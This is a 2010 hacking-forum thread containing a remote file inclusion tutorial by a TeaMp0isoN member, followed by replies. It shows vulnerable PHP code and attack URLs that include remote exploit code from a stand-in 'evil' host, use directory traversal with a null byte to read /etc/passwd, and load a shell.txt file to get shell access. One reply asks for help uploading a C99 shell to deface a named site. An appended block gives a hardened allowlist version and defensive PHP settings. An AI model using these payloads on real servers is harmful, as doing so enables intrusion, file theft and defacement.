Post: Remote File Include [RFI] [TUT] [eXhAiL][TeaMp0isoN]
02-20-2010, 03:03 AM #1
eXhAiL
Keeper
Here is a short tutorial on RFI. I say short as it is easy to explain.

Q: What is RFI?
A: Remote file inclusion.

Q: What does RFI do?
A: It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.

Checking for an RFI: normally it occurs in PHP external variables such as:
    $_GET, $_POST, $_COOKIE


Example of bad coding for an RFI (the include path is built directly from user input):

    <?php
    $color = 'red';
    if (isset($_GET['COLOR'])) {
        $color = $_GET['COLOR'];
    }
    // Whatever arrives in COLOR is concatenated straight into the include path.
    require($color . '.php');
    ?>

    <form method="get" action="<?php echo $_SERVER['PHP_SELF']; ?>">
    <select name="COLOR">
    <option value="black">black</option>
    <option value="red">red</option>
    </select>
    <input type="submit">
    </form>


The coder intended only black.php and red.php to be used as options. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code and commands from files....

Examples of command lines for it:

    - site.com/vuln.php?COLOR=https://evil/exploit? - injects a remotely hosted file containing an exploit.
    - site.com/vuln.php?COLOR=C:\\ftp\\upload\\exploit - executes code from an already uploaded file called exploit.php.
    - site.com/vuln.php?COLOR=../../../../../../../../etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system (directory traversal).
    - site.com/vuln.php?COLOR=C:\\shell.txt%00 - example using the NULL meta character to remove the .php suffix, allowing access to files other than .php.


There is also another way of checking if you don't want to look at the code, but it isn't as good.
Say you have a site with
    news.php?id=1

Replace the 1 with
    https://site.com/shell.txt?
so it would look like this:
    news.php?id=https://site.com/shell.txt?

Now if the file loads as normal you will see you now have access to their site via a shell and you can use various Unix commands to do things.

Hope this tutorial helps.


Here are a few RFIs.



tutorial written by eXhAiL // TeaMp0isoN

Feel free to ask any questions.
Contact:- [email][email protected][/email]
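As an added example (not part of the original post), the tutorial's vulnerable include path beside a hardened version: the request value is only used as a key into a fixed allowlist, so the remote URL, traversal and %00 inputs from the tutorial can never reach require(). The template file names and the sample inputs are constructed for illustration.

```php
<?php
// Vulnerable pattern from the tutorial: the COLOR value is concatenated
// straight into the include path, so the attacker controls what is loaded.
function vulnerable_include_path(string $color): string
{
    return $color . '.php';
}

// Hardened version: user input is only ever a lookup key; the include path
// itself is taken from a fixed allowlist and never contains request data.
function safe_include_path(?string $color): string
{
    $templates = [
        'black' => __DIR__ . '/black.php',   // constructed template names
        'red'   => __DIR__ . '/red.php',
    ];
    // Unknown, empty or missing values fall back to the default template.
    return $templates[$color] ?? $templates['red'];
}

// Inputs taken from the tutorial's examples (constructed here, not live).
$attempts = [
    'red',
    'https://evil/exploit?',
    '../../../../../../../../etc/passwd' . "\0",
    'C:\\shell.txt' . "\0",
];

foreach ($attempts as $input) {
    $shown = str_replace("\0", '%00', $input);   // keep the null byte readable
    printf("input:      %s\n", $shown);
    printf("vulnerable: %s\n", str_replace("\0", '%00', vulnerable_include_path($input)));
    printf("hardened:   %s\n\n", safe_include_path($input));
}

// Defence in depth: keep allow_url_include=Off in php.ini (the default since
// PHP 5.2) so include/require cannot fetch remote URLs even if a path check
// is missed, and set allow_url_fopen=Off where remote reads are not needed.
```

In the hardened function the only values that ever reach require() are the two allowlisted paths, which is what makes the %00 and traversal tricks irrelevant rather than merely filtered.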
02-20-2010, 04:30 AM #2
What you mean many more posted in the VIP section?
02-20-2010, 05:17 AM #3
eXhAiL
Keeper
Originally posted by LordOfSpoon
What you mean many more posted in the VIP section?


Sorry, I was referring to the fact that I did this post for the p0ison forum.
And I posted a big RFI list; I'll edit it now.
02-20-2010, 05:19 AM #4
Oh alright, I was like, how did you get in, rofl.
08-06-2010, 05:48 PM #5
Hi eXhAil. I was wondering if I could get in touch with TriCk. I want to learn how to deface and I tried searching you and TriCk on hackforums.net. I have my C99 shell and uploader but I don't know how to upload the shell/uploader to the website. The site is omg.uk.net and the cPanel is omg.uk.net:2082 .
Ty.
You wrote this on my birthday :black:
-DaRkOpTiC
(Call me a script kiddie if you want to :jimSmile
Sorry for bumping...
08-06-2010, 10:07 PM #6
l33t j0rd4n
Is it because I'm 1337
Ryan, what is up with you? p0ison isn't even up. Phil is making it again I think, though? He said to me he is, about a month ago. Don't know if he still is, but it's not up at the moment:jim:
